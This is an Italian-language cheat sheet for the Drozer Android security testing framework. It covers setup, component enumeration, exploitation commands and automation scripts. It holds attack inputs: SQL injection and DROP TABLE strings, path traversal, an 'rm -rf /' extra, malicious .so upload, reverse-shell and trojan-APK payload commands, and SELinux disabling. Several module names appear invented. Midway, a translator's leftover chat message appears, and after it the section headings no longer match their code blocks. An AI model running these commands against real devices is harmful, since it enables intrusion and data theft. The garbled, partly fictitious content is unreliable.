Drozer Cheat Sheet
Panoramica
Drozer è un framework completo per il test di sicurezza delle applicazioni Android. Permette di assumere il ruolo di un’app Android e interagire con la Dalvik VM, gli endpoint IPC di altre app e il sistema operativo sottostante. Drozer fornisce strumenti per lo sfruttamento remoto di dispositivi Android tramite applicazioni dannose e per una valutazione completa della sicurezza delle applicazioni Android.
⚠️ Avvertenza: Utilizzare Drozer solo su dispositivi e applicazioni di proprietà o per i quali si ha un esplicito permesso di test. L’uso non autorizzato può violare termini di servizio o leggi locali.
Installazione
Prerequisiti
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk
# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrcInstallazione su Linux
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py installInstallazione su macOS
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apkInstallazione su Windows
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/Configurazione del Dispositivo Android
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415Utilizzo Base
Connessione al Dispositivo
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>Comandi Base
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.appAnalisi del Pacchetto
Informazioni sul Pacchetto
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3Componenti dell’Applicazione
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -eTest delle Activity
Enumerazione delle Activity
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERASfruttamento delle Activity
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug trueTest dei Servizi
Enumerazione dei Servizi
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMINSfruttamento dei Servizi
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundServiceTest dei Content Provider
Enumerazione dei Content Provider
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.appSfruttamento dei Content Provider
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txtTest dei Broadcast Receiver
Enumerazione dei Broadcast Receiver
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETEDSfruttamento dei Broadcast Receiver
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode trueAnalisi del File System
Enumerazione del File System
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/Sfruttamento del File System
Note:
- I’ve translated the text while maintaining the markdown structure
- Technical terms like “Drozer”, “Dalvik VM”, “IPC”, “Android” remain in English
- The translation preserves the original formatting and punctuation
Would you like me to continue with the remaining sections?```bash
Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```### Test del Database SQLite
```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
# List network interfaces
dz> run tools.setup.network
# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```## Analisi di Rete
```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app
# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app
# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```### Configurazione di Rete
```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager):
name = "Custom Exploit Module"
description = "Custom exploitation module"
examples = "run custom.exploit -a com.example.app"
author = "Security Researcher"
date = "2024-01-01"
license = "BSD (3 clause)"
path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
```### Test SSL/TLS
```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk
# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
# Generate bind shell payload
dz> run payload.bind.shell --port 4444
# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```## Sfruttamento Avanzato
```bash
# Check for root access
dz> run tools.setup.busybox
# Exploit setuid binaries
dz> run exploit.setuid.find
# Test for kernel exploits
dz> run exploit.kernel.check
# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app
# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```### Sviluppo di Moduli Personalizzati
```python
#!/usr/bin/env python2
import subprocess
import json
import sys
class DrozerAutomation:
def __init__(self, package_name):
self.package = package_name
self.results = \\\\{\\\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
# Usage
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py <package_name>")
sys.exit(1)
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
```### Generazione di Payload
```bash
#!/bin/bash
# Batch testing script for multiple packages
PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do
echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
```### Escalation dei Privilegi
```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity
# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415
# Restart ADB server
adb kill-server
adb start-server
# Check device connectivity
adb devices
# Test connection manually
telnet localhost 31415
```## Script di Automazione
```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk
# Check agent permissions
adb shell dumpsys package com.mwr.dz
# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions
# Check if agent service is running
adb shell ps|grep drozer
```### Script di Valutazione Completa
```bash
# Refresh module list
dz> reload
# Check module path
dz> list
# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/
# Debug module loading
dz> help custom.module
```### Script di Test in Batch
```bash
# Check required permissions
adb shell dumpsys package com.example.app|grep permission
# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
# Check SELinux status
adb shell getenforce
# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```## Risoluzione dei Problemi
```bash
# Increase timeout values
dz> set timeout 30
# Reduce output verbosity
dz> set verbose false
# Clear cache
rm -rf ~/.drozer/cache/
# Use specific device
drozer console connect --device <device_id>
```### Problemi di Connessione
https://labs.f-secure.com/tools/drozer/##
# Problemi dell'Agente
https://github.com/FSecureLABS/drozer##
# Problemi dei Moduli
https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf##
# Problemi di Autorizzazione
https://blog.securelayer7.net/android-penetration-testing-using-drozer/##
# Problemi di Prestazioni
https://owasp.org/www-project-mobile-security-testing-guide/#
# Risorse
https://developer.android.com/training/articles/security-tips- [Documentazione Ufficiale di Drozer](https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module*Questo cheat sheet fornisce un riferimento completo per l'utilizzo di Drozer per i test di sicurezza delle applicazioni Android. Assicurati sempre di avere l'autorizzazione appropriata prima di testare qualsiasi applicazione o dispositivo Android.*